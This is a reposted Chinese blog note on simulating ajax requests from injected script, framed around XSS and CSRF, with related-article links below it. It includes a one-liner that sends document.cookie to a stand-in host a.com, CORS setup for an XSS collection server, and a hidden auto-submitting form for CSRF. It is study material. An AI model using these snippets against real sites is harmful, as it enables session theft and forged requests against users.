ajax模拟请求

最新推荐文章于 2022-06-19 15:26:52 发布
最新推荐文章于 2022-06-19 15:26:52 发布
阅读量242 收藏
点赞数
文章标签: php javascript ViewUI
原文链接:http://www.cnblogs.com/iamstudy/articles/ajax_note.html
版权

目录

理解ajax

核心对象是XMLHttpRequest(简称xhr),IE7之前是通过ActiveXObject对象实现的。

  • 异步:独立于浏览器主线程去做自己的事情,
  • 同步:请求发送后需要等待响应回来,这个时期进入阻塞阶段

xhr实例化

var xmlhttp;
if(windows.XMLHttpRequest){
    xmlhttp = new XMLHttpRequest();
}else{
    //ie5、ie6
    xmlhttp = new ActiveObject("Microsoft.XMLHTTP");
}

GET请求

ajax是遵守同源策略的,w3c的CORS(Cross-OriginResource Sharing)方案支持跨域,在接收信息(xss平台)设置:

<?php header("Access-Control-Allow-Origin: *")?>

其中*为任意域都行,也可以设置为指定的某域
当漏洞点给xss平台发送请求的时候,浏览器会自动加上Origin头,xss平台会判断这个头中的域是不是自己允许的域。不是就会爆出权限错误,虽然报错,但是还是接收到了数据

804631-20150831131149606-1407789254.png
GET请求

<script>
function getRequest(method,url){
    var xhr = new XMLHttpRequest();
    if("withCredentials" in xhr){
        //ture表示是异步,false表示是同步
        xhr.open(method,url,true);
    }else if(typeof XDomainRequest != "undefined"){
        //IE bowser
        xhr = new XDomainRequest();
        xhr.open(method,url);
    }else{
        xhr = null;
    }
    return xhr;
}
var request = getRequest("get","http://a.com/ajax.php?get=testaaa");
if(request){
    //request success
    /*request.onload = function(){
        //alert request date
        alert(request.responseText);
    }*/
    //send request
    request.send();
}
</script>

简单化get请求

//新建img标签对象
new Image().src="http://a.com/ajax.php?get="+escape(document.cookie);
//地址栏打开目标网址,地址会跳转,隐蔽性不高
location.href="http://a.com/ajax.php?get="+escape(document.cookie);

简单POST请求

<script>
//xhr object
xhr = function(){
    var request = false;
    if(window.XMLHttpRequest){
        request = new XMLHttpRequest();
    }else if(windows.ActiveXObject){
        try{
            request = new windows.ActiveXObject('Microsoft.XMLHTTP');
        }catch(e){}
    }
    return request;
}();

request = function(method,src,argv,content_type){
    //false 同步
    xhr.open(method,src,false);
    if(method=='POST')
        xhr.setRequestHeader('content-Type',content_type);
    xhr.send(argv);
    return xhr.responseText;
};

attack_a = function(){
    var src = "http://a.com/ajax.php";
    var argv_0 = "&post=postok";
    request("POST",src,argv_0,"application/x-www-form-urlencoded");
};
attack_a();
</script>

其中application/x-www-form-urlencoded是默认的标准表单提交格式
还有一种是上传文件中常见,multipart/form-data

POST模拟表单提交

<script>
//xhr object
xhr = function(){
    var request = false;
    if(window.XMLHttpRequest){
        request = new XMLHttpRequest();
    }else if(windows.ActiveXObject){
        try{
            request = new windows.ActiveXObject('Microsoft.XMLHTTP');
        }catch(e){}
    }
    return request;
}();

request = function(method,src,argv,content_type){
    //false 同步
    xhr.open(method,src,false);
    if(method=='POST')
        xhr.setRequestHeader('content-Type',content_type);
    xhr.send(argv);
    return xhr.responseText;
};

attack_a = function(){
    var src = "http://a.com/ajax.php";
    var name1 = "value1";
    var name2 = "value2";
    var argv_0 = "\r\n";
    argv_0 += "---------------------7964f8dddeb95fc5\r\nContent-Disposition:form-data;name=\"name1\"\r\n\r\n";
    argv_0 += (name1+"\r\n");
    argv_0 += "---------------------7964f8dddeb95fc5\r\nContent-Disposition:form-data;name=\"name2\"\r\n\r\n";
    argv_0 += (name2+"\r\n");
    request("POST",src,argv_0,"multipart/form-data;boundary=-------------------7964f8dddeb95fc5");
}
attack_a();
</script>

动态创建表单提交(常用于csrf)

通过javascript动态的常见一个form

<html>
<body>
<script>
function new_form(){
    var f = document.createElement("form");
    document.body.appendChild(f);
    f.method = "post";
    return f;
}
function create_elements(eForm,eName,eValue){
    var e = document.createElement("input");
    eForm.appendChild(e);
    e.type = 'text';
    e.name = eName;
    if(!document.all){
        e.style.display= 'none';
    }else{
        e.style.display = 'block';
        e.style.width - '0px';
        e.style.height = '0px';
    }
    e.value = eValue;
    return e;
}
var _f = new_form();
create_elements(_f,"post","zzzz");
//create_elements(_f,"name2","value2");
//提交地址
_f.action = "http://a.com/ajax.php";
_f.submit();
</script>
</body>
</html>

notice:
本地测试的时候没有加上<html><body>xxx</body></html>,然后报错Uncaught TypeError: Cannot read property 'appendChild' of null
参考了二哥的回复:点击我打开
原因是document.body.appendChild(f);在添加form时候并没有body,于是会爆出null

转载于:https://www.cnblogs.com/iamstudy/articles/ajax_note.html

dengzhasong7076
关注
创建一个简单的本地ajax请求
weixin_68153901的博客
02-25 324
创建一个请求的对象,xhr,设置初始值,第一个值,请求方式,‘get’,第二个参数,请求的url路径,xhr.send();发送 (如果是post请求,post的请求体可以放在send()里面),服务端返回要处理的数据, readyState是xhr的一个属性,1表示初始化,2表示发送,3表示返回部分数据,4返回了全部的数据,判断一下这个属性的值是不是等于4全部返回了,然后在判断以下状态码是不是两百,两百表示成功,最后把响应体的内容输入到html页面中。在原生ajax右键打开在终端打开。
ajax请求模拟json数据,ajax+json进行数据传输请求(ssm框架)
weixin_32532029的博客
08-05 564
以前跟着视频学习时候就了解到,ajax是能够不刷新整个页面状况下,进行数据交换和更新。学习完后,为了加深理解,特意从新研究了下ajax和JSON之间的交互。javascript注意,要使用ajax,须要先引用jquery!html1.一、在pom引入json和jackson的jar包前端net.sf.json-libjson-lib2.4jdk15com.fasterxml.jackson.cor...
ajax怎么模拟请求,如何模拟AJAX请求
weixin_32661831的博客
08-05 665
在端到端测试期间修改scenarios.js以模拟AJAX请求的最简单方法是什么?如何模拟AJAX请求?My Test AngularJS Appangular.module('myApp', ['ngResource']);function PlayerController($scope,$resource){$scope.player = $resource('player.json').ge...
Postman 工具模拟Ajax请求
weixin_30325487的博客
09-05 488
1.请求方式 post 2.headers设置:X-Requested-With:XMLHttpRequest 代码判断是以此为依据的 (Content-Type:application/x-www-form-urlencoded) 3.body中可以写请求参数,不过要设置编码方式(我没有传值) 转载于:http...
模仿jquery的ajax请求
【轰炸机】的博客
09-29 231
模仿jquery的ajax请求核心js调用例子 核心js // XMLHttpRequest这个对象的属性 //   onreadystatechange 每次状态改变所触发事件的事件处理程序。 //   responseText 从服务器进程返回数据的字符串形式。 //   responseXML 从服务器进程返回的DOM兼容的文档数据对象。 //   status 从服务器返回的数字代码,比如常见的404(未找到)和200(已就绪) //   status Text 伴随状态码的字符串信息 //   r
手动模拟一个类似jquery的ajax请求
weixin_30835649的博客
02-22 87
1 var $ = { 2 parms:function(obj){ 3 var str = ''; 4 for(var k in obj){ 5 str +=k+'='+obj[k]+'&'; 6 } ...
ajax请求模拟referer,用头和请求负载模拟AJAX请求
weixin_42515136的博客
08-06 1758
这是我要抓取的网站。当您打开该网站时,将使用ajax请求生成列表。当您向下滚动时,相同的请求会一直填充页面。这就是他们如何实现无限滚动。。。在当我向下滚动时,我发现这是发送到服务器的请求,我试图用头和请求负载模拟相同的请求。这是我的蜘蛛。在class MySpider(scrapy.Spider):name = 'kralilanspider'allowed_domains = ['kralila...
实例详解jQuery Mockjax 插件模拟 Ajax 请求
11-26
1. **清除模拟请求**:使用`$.mockjax.clear()`方法可以清除所有模拟请求,如果需要清除特定模拟请求,可以传入其ID。 2. **URL匹配**:`url`参数可以接受通配符 `*` 和正则表达式,以匹配不同形式的URL。 3. **响应...
python模拟ajax请求_短信炸弹—用Python模拟ajax请求
weixin_32949451的博客
02-04 505
我们经常使用各种脚本发送网络请求,提交各种形式的body数据,所以Content-Type的类型也有很多种。常见的取值有:application/xml : 在 XML RPC,如 RESTful/SOAP 调用时使用application/json : 在 JSON RPC 调用时使用application/x-www-form-urlencoded : 浏览器提交 Web 表单时使用Conte...
postman模拟ajax请求
localhost
01-04 290
后台用@ResponseBody接收参数
Java 模拟Ajax POST GET 提交代码
05-17
Java 模拟Ajax POST GET 提交代码,实测很好用。
模拟Ajax请求爬取网站动态信息
hellocoding的博客
12-23 906
  有时候我们在用requests抓取页面的时候,得到的结果可能和在浏览器中看到的不一样:在浏览器中可以看到正常显示的页面数据,但是使用requests得到的结果中并没有。这是因为requests获取的都是原始的HTML文档,而浏览器中的页面则是经过JavaScript处理数据后生成的结果,这些数据的来源有多种,可能是通过Ajax加载的,可能是包含在HTML文档中的,也可能是经过JavaScript 和特定算法计算后生成的。   对于第一种情况,数据加载是一种异步加载方式,原始的页面最初不会包含某些数据,原
JavaScript模拟Ajax请求实现基础分页效果
Tianxiaoxixi的博客
06-19 315
JavaScript模拟Ajax请求实现基础分页效果
虚拟表单提交模拟ajax请求
u011365716的博客
04-26 2992
前端开发人员经常会遇到ajax请求出现跨域问题,比如做单点登录。结合本人开发经验推荐一方法——虚拟表单提交,解决此类问题。此方法的特点是简单易懂!好了,直接上干货! function formCommit(){ varformobj; //window.top.open(url,"_blank"); $.ajax({ type:'post', dataType:'jsonp', url:...
怎么模拟ajax请求,如何使用mock.js取代json-server模拟Ajax请求
weixin_32662187的博客
08-06 225
在我的课程里,我给大家推荐的模拟Ajax请求的方式采用了自己搭建服务器,访问json文件的方式,这种方式比较复杂,而且容易产生这样那样的问题,所以我在这里强烈推荐使用mock.js来取代json-server或者express。mock.js实现的思路跟json-server不同,它实现的方法是,拦截ajax请求,并返回随机数据。在vue.js 项目里,遵循如下步骤使用mock.js:第一步,安装...
网络请求fetchs ajax 模拟数据(node 响应数据) -原生
web修理工
06-04 489
fetchs <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Page Title</title> <meta name="viewport" content="width=device-width,
Vue如何mock数据模拟Ajax请求
weixin_30832983的博客
10-17 471
我们在做一个项目时前期可能没有后端提供接口模拟数据,那么作为前端就需要自己写json文件模拟数据加载。网上往往参考的都是不全面的,比如get请求没问题但是post请求就报错了。在Vue中只需要vue-resource(也可以使用axios,安装方法和vue-resource一样,具体使用方法可以去axios官网查看,在这里我使用vue的插件vue-resource)和body-pa...
html调用ajax请求,javascript – 在href中调用Ajax请求函数
weixin_29323977的博客
06-04 517
我在html页面中有一个href,我在javascript文件中的方法中有一个AJAX请求.当点击href时,我想调用JS函数,我正在处理响应,将其添加到第二个html页面,该页面将出现function miniReport(){alert('TEST');var client_account_number = localStorage.getItem("numb");var request = ...
模拟Ajax请求,前台页面无跳转
X月L
02-22 1896
前台的html //form表单 关闭 后台的php文件 alert("恭喜您已成功提交留言信息,审核中......"); function alert($str, $exit = false) {     echo '';     echo 'window.alert("'
postman 模拟ajax请求
最新发布
07-27
你可以使用 Postman 来模拟 AJAX 请求。以下是一些步骤: 1. 打开 Postman。 2. 在请求 URL 输入框中输入要请求的 API 地址。 3. 选择请求方法(GET、POST、PUT、DELETE等)。 4. 如果有请求头,可以在 Headers ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值